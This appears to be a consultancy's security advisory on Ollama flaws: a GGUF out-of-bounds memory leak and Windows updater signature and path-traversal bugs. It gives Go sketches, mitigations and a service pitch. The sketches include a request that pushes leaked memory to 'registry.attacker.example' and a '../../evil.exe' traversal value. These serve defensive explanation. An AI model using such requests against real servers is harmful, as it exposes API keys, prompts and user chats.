11 May 2026 · 4 min read

Critical Ollama vulnerability: remote memory exposure and what it means for LLM estates

Artificial intelligence is reshaping how organisations operate—driving innovation and efficiency. That same momentum introduces new threat surfaces that demand continuous monitoring and disciplined risk management. Researchers have now disclosed a critical issue in Ollama, the widely used open-source runtime for local large language models (LLMs), illustrating how complex AI infrastructure security can become.

CVE-2026-7482: “Bleeding Llama” memory disclosure

Security researchers have reported an out-of-bounds read in Ollama, tracked as CVE-2026-7482 and nicknamed “Bleeding Llama” by Cyera. Rated CVSS 9.1 (Critical), the flaw allows a remote, unauthenticated attacker to leak the entire memory footprint of the Ollama process. Estimates suggest it may affect more than 300,000 exposed servers worldwide—material risk for any organisation hosting LLM workloads on Ollama.

Why out-of-bounds reads matter

In plain terms, the program reads past the end of an allocated buffer, so whatever happens to sit in adjacent memory flows into output the attacker can observe, exposing secrets that should never leave the process boundary.

For Ollama, the weakness sits in the GGUF (GPT-Generated Unified Format) loader, specifically in WriteTo() during quantization, when the server builds a model from an uploaded GGUF via /api/create. A crafted GGUF whose tensor offset/size values exceed the real file length causes the server to read beyond its buffer: classic information disclosure at process scale.
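
To make the failure mode concrete, here is a minimal Go sketch, illustrative only and not Ollama's actual code, contrasting blind trust in file-supplied tensor bounds with explicit validation:

```go
package main

import (
	"errors"
	"fmt"
)

// tensorHeader stands in for the per-tensor metadata a GGUF file carries:
// where the tensor's data starts and how many bytes it spans. Both values
// come straight from the uploaded file, i.e. from the attacker.
type tensorHeader struct {
	Offset uint64
	Size   uint64
}

// readTensorUnsafe shows the vulnerable shape: slicing with file-supplied
// offset/size and no bounds check. On a plain Go slice this panics, but on
// a memory-mapped buffer whose capacity extends past the file's logical
// length, the same arithmetic quietly reads adjacent process memory.
func readTensorUnsafe(buf []byte, h tensorHeader) []byte {
	return buf[h.Offset : h.Offset+h.Size] // no validation
}

// readTensorChecked rejects headers whose range overflows or falls outside
// the bytes that were actually uploaded.
func readTensorChecked(buf []byte, h tensorHeader) ([]byte, error) {
	end := h.Offset + h.Size
	if end < h.Offset || end > uint64(len(buf)) {
		return nil, errors.New("tensor offset/size exceeds file bounds")
	}
	return buf[h.Offset:end], nil
}

func main() {
	file := make([]byte, 64) // stand-in for an uploaded GGUF payload
	hostile := tensorHeader{Offset: 32, Size: 1 << 20}
	if _, err := readTensorChecked(file, hostile); err != nil {
		fmt.Println("rejected:", err)
	}
	_ = readTensorUnsafe // shown for contrast; calling it here would panic
}
```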

Business impact of a full-process memory leak

Successful exploitation of CVE-2026-7482 can be severe for confidentiality. Process memory may hold:

  • Environment variables with sensitive configuration.
  • API keys granting access to internal and external services.
  • System prompts exposing business logic or intellectual property.
  • Concurrent user chat content with direct privacy and compliance implications.

Attackers could move stolen artefacts off-box by pushing the resulting model blob to an attacker-controlled registry through /api/push. Dor Attias, a Cyera security researcher, noted that “An attacker can learn basically anything about the organisation from its AI inference: API keys, proprietary code, customer contracts, and more.” Integrations such as Claude Code widen the blast radius if tool output is routed through the same Ollama instance.
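
The off-box step needs nothing beyond Ollama's own REST API. As a rough sketch of why an unauthenticated /api/push endpoint is dangerous (the host, model name, and registry below are hypothetical, and the request body is simplified; field names vary across Ollama versions):

```go
package main

import (
	"bytes"
	"fmt"
	"net/http"
)

func main() {
	// Hypothetical exposed instance on Ollama's default port.
	base := "http://ollama.victim.example:11434"

	// Step 1 (conceptual, not shown): POST a crafted GGUF to /api/create so
	// quantization copies out-of-bounds process memory into the model blob.
	// Step 2: ask the same server to push that blob to a registry the
	// attacker controls. No credentials are ever required of the caller.
	body := []byte(`{"model": "registry.attacker.example/loot/dump:latest"}`)
	resp, err := http.Post(base+"/api/push", "application/json", bytes.NewReader(body))
	if err != nil {
		fmt.Println("request failed:", err)
		return
	}
	defer resp.Body.Close()
	fmt.Println("push responded with status:", resp.Status)
}
```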

Windows updater issues: chained pre-auth persistence

Separately, Striga researchers outlined two flaws in Ollama’s Windows update mechanism that can be chained for persistent code execution.

Publicly disclosed in January 2026 and, at the time of reporting, still without a vendor patch, they impact Ollama for Windows versions 0.12.10 through 0.17.5:

  • CVE-2026-42248 (CVSS 7.7) — missing signature verification. Unlike the macOS client, the Windows client does not validate the updater binary’s signature before installing it, opening the door to malicious replacements.
  • CVE-2026-42249 (CVSS 7.7) — path traversal. The updater derives a local staging path from unsanitised HTTP response headers, enabling writes outside the intended directory (sketched below).
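
The traversal pattern is easy to picture. Below is an illustrative Go sketch, not the updater's real code, contrasting a staging path built straight from a server-supplied header with one that strips and re-checks it:

```go
package main

import (
	"errors"
	"fmt"
	"path/filepath"
	"strings"
)

// stagingPathUnsafe mirrors the vulnerable shape: joining a filename taken
// from an HTTP response header straight into a local path. filepath.Join
// resolves ".." components, so a hostile header escapes the staging dir.
func stagingPathUnsafe(dir, headerName string) string {
	return filepath.Join(dir, headerName)
}

// stagingPathSafe drops any directory components from the header value and
// double-checks that the result still lives under the staging directory.
func stagingPathSafe(dir, headerName string) (string, error) {
	name := filepath.Base(filepath.Clean(headerName))
	if name == "." || name == ".." || name == "" {
		return "", errors.New("invalid update filename")
	}
	full := filepath.Join(dir, name)
	if !strings.HasPrefix(full, filepath.Clean(dir)+string(filepath.Separator)) {
		return "", errors.New("update filename escapes staging directory")
	}
	return full, nil
}

func main() {
	dir := "/opt/ollama/staging" // stand-in for the Windows staging directory
	fmt.Println(stagingPathUnsafe(dir, "../../evil.exe")) // /opt/evil.exe -- escaped!
	fmt.Println(stagingPathSafe(dir, "../../evil.exe"))   // /opt/ollama/staging/evil.exe <nil>
}
```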

Because the client auto-starts at Windows logon, an attacker who can influence the update channel could achieve durable compromise: reverse shells, credential theft (browser secrets, SSH keys), or dropper-driven persistence.

Mitigations that actually move the needle

Protecting LLM runtimes and their hosts requires layered controls:

  • Patch cadence: move Ollama to 0.17.1 or newer for CVE-2026-7482. On Windows, disable automatic updates and remove Ollama shortcuts from Startup (%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup) until official fixes ship for the updater issues.
  • Network restraint: restrict listener exposure to required IPs/ports; avoid direct internet placement where possible.
  • Exposure audits: find and remediate any Ollama instances visible from untrusted networks or the public internet.
  • Segmentation: isolate inference hosts with tight firewall policy to slow lateral movement.
  • Authentication front-ends: Ollama’s REST API ships without built-in auth; front every instance with an authentication proxy or API gateway (a minimal sketch follows this list).
  • OS hardening: apply baseline hardening to Linux and Windows hosts—permissions, service minimisation, secure configuration.
  • Continuous monitoring: watch for anomalous model uploads, registry pushes, and data exfiltration patterns tied to LLM services.
  • LLM programme hygiene: periodic reviews of API key handling, prompt protection, and user-data processing.
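
For the authentication front-end point above, the control can be as small as a reverse proxy that checks a shared secret before anything reaches the model endpoint. A minimal sketch, assuming Ollama is bound to loopback and a hypothetical OLLAMA_PROXY_TOKEN environment variable carries the secret (a production gateway would add TLS, rate limiting, and per-route policy):

```go
package main

import (
	"crypto/subtle"
	"log"
	"net/http"
	"net/http/httputil"
	"net/url"
	"os"
)

func main() {
	// Upstream Ollama listening on loopback only, so this proxy is the sole
	// way in from the network.
	upstream, err := url.Parse("http://127.0.0.1:11434")
	if err != nil {
		log.Fatal(err)
	}
	proxy := httputil.NewSingleHostReverseProxy(upstream)

	// Shared secret supplied via a hypothetical environment variable.
	token := os.Getenv("OLLAMA_PROXY_TOKEN")
	if token == "" {
		log.Fatal("OLLAMA_PROXY_TOKEN must be set")
	}
	want := []byte("Bearer " + token)

	handler := http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		got := []byte(r.Header.Get("Authorization"))
		// Constant-time comparison avoids leaking the token via timing.
		if subtle.ConstantTimeCompare(got, want) != 1 {
			http.Error(w, "unauthorized", http.StatusUnauthorized)
			return
		}
		proxy.ServeHTTP(w, r)
	})

	// The proxy, not Ollama, is what the network sees.
	log.Fatal(http.ListenAndServe(":8443", handler))
}
```

A front-end like this only helps alongside the network restraint and segmentation points: close direct routes to port 11434 so the proxy is genuinely the sole path to the model.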

ITCS VIP: securing AI platforms and the stacks beneath them

At ITCS VIP, we treat AI security as infrastructure security—not a marketing slide. Our engagements help organisations reduce attack surface and operationalise defensible LLM architectures:

  • Infrastructure hardening: Linux and Windows baselines aligned to industry practice.
  • Private AI & LLM assessments: configuration review, self-hosted risks (including Ollama-style deployments), API posture, data segregation, and prompt-injection resilience.
  • Linux security consulting: design and operational guidance for the platforms underpinning many AI estates.
  • Authentication proxies & API gateways: engineered controls ensuring only legitimate clients reach model endpoints.

Closing thought

Ollama’s disclosures are a blunt reminder: feature velocity without security discipline leaks memory, secrets, and trust. Pair technical hardening with periodic assurance and disciplined update management—especially on auto-update paths.

Do not wait for incident response to justify investment. Contact ITCS VIP for an assessment tailored to your AI infrastructure and threat model.

Editorial context: additional reporting on The Hacker News.